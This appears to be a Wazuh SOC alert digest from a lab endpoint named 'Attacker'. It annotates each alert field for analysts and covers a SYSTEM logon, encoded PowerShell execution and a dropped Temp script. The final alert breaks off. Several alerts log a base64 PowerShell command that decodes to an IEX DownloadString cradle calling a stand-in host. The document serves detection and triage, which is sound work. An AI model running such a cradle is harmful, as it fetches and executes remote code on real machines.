🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:38:39.348+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:39.348+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  57
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534319.1671705
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:36.5651451Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43873
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:40.874+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:40.874+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  74
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534320.1679042
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:38.2272668Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284720
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:36.142 ProcessGuid: {94294ddc-bd6c-680a-7e0b-000000000e00} ProcessId: 14508 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd69-680a-7b0b-000000000e00} ParentProcessId: 7408 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:36.142
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd6c-680a-7e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14508
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd69-680a-7b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  7408
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:40.877+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:40.877+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  78
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534320.1687109
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:38.4764370Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284721
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:38.465 ProcessGuid: {94294ddc-bd6c-680a-7e0b-000000000e00} ProcessId: 14508 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_qxtyh4i4.l1m.ps1 CreationUtcTime: 2025-04-24 22:38:38.465 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:38.465
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd6c-680a-7e0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14508
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_qxtyh4i4.l1m.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:38.465
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:43.514+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:43.514+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  75
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534323.1689878
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:40.8912001Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284776
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:39.577 ProcessGuid: {94294ddc-bd6f-680a-840b-000000000e00} ProcessId: 6508 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd6c-680a-7e0b-000000000e00} ParentProcessId: 14508 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:39.577
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd6f-680a-840b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  6508
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

